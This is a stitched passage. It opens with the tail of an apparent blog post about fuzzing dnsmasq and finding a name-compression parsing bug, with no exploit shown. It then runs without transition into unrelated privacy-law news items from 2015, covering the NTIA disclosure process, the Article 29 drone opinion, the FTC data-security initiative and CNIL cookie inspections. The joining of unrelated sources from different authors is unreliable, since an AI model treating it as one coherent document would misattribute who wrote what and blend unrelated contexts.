It was disappointing, to say the least, but on the plus side the process was interesting enough to write about! :)

Conclusion

So to summarize everything...

  • I modified dnsmasq to read packets from a file instead of the network, then used afl-fuzz to fuzz and crash it.
  • I found a recently introduced vulnerability in the parsing of "\xc0\x0c"-compressed names combined with the appended periods.
  • I triaged the vulnerability and started writing an exploit.
  • I determined that the vulnerability existed only in brand new code, so I gave up on the exploit and decided to write a blog post instead.

And who knows, maybe somebody will develop one for fun? If anybody does, I'll give them a month of Reddit Gold!!!! :)

(I'm kidding about using that as a motivator, but I'll really do it if anybody bothers :P)

NTIA Announces Cybersecurity Stakeholder Meeting

On July 9, 2015, the National Telecommunications and Information Administration (“NTIA”) announced the launch of its first cybersecurity multistakeholder process, in which representatives from across the security and technology industries will meet in September to discuss vulnerability research disclosure.

This process is the first effort of the multistakeholder initiative, which was announced by the Department of Commerce in March. The initiative aims to address the major cybersecurity threats and issues facing the digital ecosystem as a whole, shoring up defenses against such threats with an eye toward fostering a healthy economy in the digital space.

The NTIA will act as a neutral facilitator for discussions among security researchers, software vendors, and “those interested in a more secure digital ecosystem,” as those parties work toward developing best practices and common principles for operating safely in the digital arena. Although there is no set agenda or proposed result, the NTIA suggested in a fact sheet released by the White House that “potential outcomes could include a set of high level principles that could guide future private sector policies, or a more focused and applied set of best practices for a particular set of circumstances.”

The topic of vulnerability disclosure was selected after a comment period, which drew responses from the American Civil Liberties Union and Microsoft, as well as a number of cybersecurity organizations and other industry groups. Many of these groups expressed concern about the current climate of vulnerability disclosure, in which large corporations have frequently threatened legal action against “security researchers” who discover weaknesses in their systems and propose to announce such weaknesses publicly. Among the solutions presented by the comments are “bug bounty” programs, which actually incentivize such detection, as well as industry-wide agreements not to sue or report to law enforcement individuals who detect vulnerabilities.

The meeting has not been given an exact date or location, but is expected to be held in the San Francisco Bay Area and will be webcast simultaneously.

Article 29 Working Party Issues Opinion on Drones

On June 16, 2015, the Article 29 Working Party (the “Working Party”) adopted an Opinion on Privacy and Data Protection Issues relating to the Utilization of Drones (“Opinion”). In the Opinion, the Working Party provides guidance on the application of data protection rules in the context of Remotely Piloted Aircraft Systems, commonly known as “drones.”

The Working Party deemed it necessary to issue specific guidance on this topic as the large-scale deployment of drones and sensor technology on board drones presents several risks with respect to privacy and data protection. These risks result, in particular, from the lack of transparency with regard to the personal data (such as images, sounds and geolocation data) processed by drones and the ability to use multiple drones to collect a wide variety of information for extended periods of time across large areas.

After identifying the privacy and data protection risks related to the use of drones and examining the applicability of EU Data Protection Directive 95/46/EC to drones, the Working Party provided recommendations for European and national legislators, manufacturers of drones and related equipment, and drone operators. The Working Party also provided specific guidelines for the use of drones by the police and other law enforcement authorities.

According to the Working Party’s recommendations, drone users should:

  • Verify the need to obtain prior authorization from the relevant civil aviation authorities.
  • Identify the most suitable legal ground for the processing of personal data while using drones.
  • Comply with the purpose limitation, data minimization and proportionality principles (e.g., by taking measures to avoid the collection of unnecessary personal data).
  • Ensure that individuals are properly informed about the processing of their personal data (e.g., by distributing leaflets to the public if drones are used during a public event) before operating a drone.
  • Implement measures to ensure that the personal data collected by drones is adequately protected and deleted or anonymized after it is no longer necessary.

In addition, drone manufacturers and operators should (1) take into account the privacy by design and privacy by default principles and (2) perform data protection impact assessments to evaluate the impact of drone applications on individuals’ right to privacy and data protection. In this respect, the Working Party requested that the competent policymakers facilitate these data protection impact assessments by developing and introducing a set of criteria for impact assessments that can easily be used by industry and drone operators.

The Working Party also (1) advised national and European regulators to introduce specific rules for the responsible use of drones and (2) suggested that manufacturers marketing small drones should be required to include sufficient information in the drone packaging about the “potential intrusiveness” of drones and the “need to respect European and national legislation and regulations protecting privacy, personal data and other fundamental rights.”

With respect to the use of drones for law enforcement purposes, the Working Party generally believes that (1) the use of drones for such purposes should be subject to judicial review and (2) law enforcement should not use drones to constantly track individuals.

Read full text of the Opinion.

Lisa Sotto Profiled in Crain’s New York Business on Breaches and Cyber Attacks

On June 29, 2015, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was profiled in a Crain’s New York Business article entitled Lawyer Goes Into the Breach. The feature highlights the Hunton & Williams privacy team and the tireless work they do for their clients. Here is an excerpt from the article:

“Ms. Sotto came to her corner of the financial world a decade ago, after years working as an environmental lawyer. Spearheading Superfund cases was rewarding, but she was intrigued by the then-nascent field of mopping up messes for companies whose computer networks have been compromised. She has assembled a team of 25 lawyers specializing in finding experts to conduct forensic investigations into when and where breaches took place and what was stolen. With cyberattacks making the news practically every week, Ms. Sotto has gotten busier. Though computers have clearly made life better in lots of ways, more people than ever can crack into these electronic vaults and uncover personal data.”

Scottish Honor for Peter Hustinx

Richard Thomas, former UK Information Commissioner and Global Strategy Advisor to the Centre for Information Policy Leadership, was invited to a unique event in Scotland last week.

Peter Hustinx, who retired as the European Data Protection Supervisor at the end of 2014, was awarded the Honorary Degree of Doctor of Science in Social Science by the University of Edinburgh.

This rare distinction, recognizing Peter’s “achievements and leadership in the field of information privacy and data protection” was conferred during an elaborate graduation ceremony which took place in the famous Usher Hall in the center of Edinburgh on July 1. Peter was cheered on by all his immediate family and several of his British friends.

The other Honorary Doctorate was awarded to Prof. Fabiola Gianotti, the prospective Director-General of the European Organization for Nuclear Research, known as CERN, whose research with the Large Hadron Collider confirmed the existence of the Higgs boson. Her award was witnessed by Prof. Peter Higgs who received the Nobel Prize for his work establishing the theoretical possibility of this particle which bears his name.

Peter Hustinx stood tall alongside two giants of science whose work may yet reveal the origins of the universe. But, in the meantime, most people will probably treat the safeguarding of their privacy as a more immediate practical concern.

CIPL Urges Expansion of Privacy Toolkit Beyond Consent

How do we focus on individuals and ensure meaningful control and the empowerment of individuals in the modern information age? What data privacy tools would drive empowerment in the digital world of today and tomorrow, perhaps more effectively and more nimbly than traditional individual consent? At a time when many countries are legislating or revising their data privacy laws and organizations are searching for best practices to embed in their business models, these questions are more relevant today than ever. In an article published on July 2, 2015, in the International Association of Privacy Professionals’ Privacy Perspective, entitled Empowering Individuals Beyond Consent, Bojana Bellamy and Markus Heyder of the Centre for Information Policy Leadership at Hunton & Williams argue that consent is no longer the best or only way to provide control and protect individuals. There are alternative and additional tools in our toolkit that can deliver effective data privacy and greater individual empowerment.

These include legitimate interest processing, new transparency, focus on risk and impact on individuals, individuals’ right of access and correction, and fair processing requirements. Bellamy and Heyder point to these “individual empowerment” mechanisms as effective privacy protection tools that ensure real focus on individuals. When used appropriately, these mechanisms likely will decrease the overuse of consent and limit consent to appropriate situations.

FTC Launches Data Security Initiative

On June 30, 2015, the Federal Trade Commission announced its new “Start With Security” business education initiative, which will provide businesses with information on data security and how to protect consumer information.

The initiative includes a guidance document that provides data security guidance based on the FTC’s 53 cases related to data security, and lays out “ten key steps to effective data security.” The steps include (1) controlling access to data, (2) requiring secure passwords and authentication, and (3) establishing procedures to ensure security measures are current and address vulnerabilities. The FTC also has launched “a one-stop website that consolidates the Commission’s data security information for businesses.”

In addition to the guidance and website, the initiative will include a series of conferences to be held across the country, the first of which will be held in San Francisco on September 9, 2015.

Discussing the initiative, Jessica Rich, the Director of the FTC’s Bureau of Consumer Protection, stated, “[a]lthough we bring cases when businesses put data at risk, we’d much rather help companies avoid problems in the first place.”

French Data Protection Authority Issues Report on Cookie Inspections

On June 30, 2015, the French Data Protection Authority (the “CNIL”) summarized the results of the cookie inspections it conducted at the end of 2014.

One year after the December 2013 publication of its cookie law recommendation (the “Recommendation”), the CNIL conducted 24 on-site inspections, 27 remote inspections and 2 hearings to assess website compliance with the Recommendation. The inspections revealed that, in general, websites do not sufficiently inform web users of the use of cookies and do not obtain their consent before placing cookies on their devices. In addition, all of the inspected websites that had implemented cookie banners placed cookies before users consented to their use (e.g., by continuing to browse the website). The CNIL also observed that websites often invite users to adjust their browser settings to refuse cookies. According to the CNIL, however, browser settings constitute a compliant opt-out mechanism only in very limited circumstances.

The CNIL, therefore, served a formal notice on approximately 20 web publishers to comply with French cookie requirements within a prescribed period of time. The formal notices are not a sanction under French law. The CNIL will impose a sanction (i.e., a fine) only if the relevant web publishers do not comply with the formal notice within the prescribed period of time. The CNIL stated that the notices do not relate to the use of analytics cookies, which may be exempt from the consent requirement in certain circumstances under French law.